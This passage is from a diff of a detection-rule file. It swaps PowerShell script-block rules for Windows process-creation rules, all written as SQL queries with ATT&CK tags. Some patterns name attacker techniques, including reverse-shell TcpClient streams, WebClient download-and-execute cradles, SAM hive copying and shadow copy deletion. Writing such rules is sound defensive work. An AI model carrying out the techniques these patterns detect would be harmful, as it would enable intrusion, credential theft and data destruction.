"frack113, Nasreddine Bencherchali", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", - "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Diagnostics" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts that use the same keywords." + "Use of Program Compatibility Troubleshooter Helper" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", + "status": "test", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administration activities" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_sam_access.yml" + }, + { + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "status": "test", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "falsepositives": [ + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "status": "experimental", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "Suspicious Scan Loop Network", + "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", "attack.execution", - "attack.t1059.001" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Remote PowerShell Session Host Process (WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "status": "test", - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Legitimate usage of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "status": "test", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", - "attack.t1059.001", - 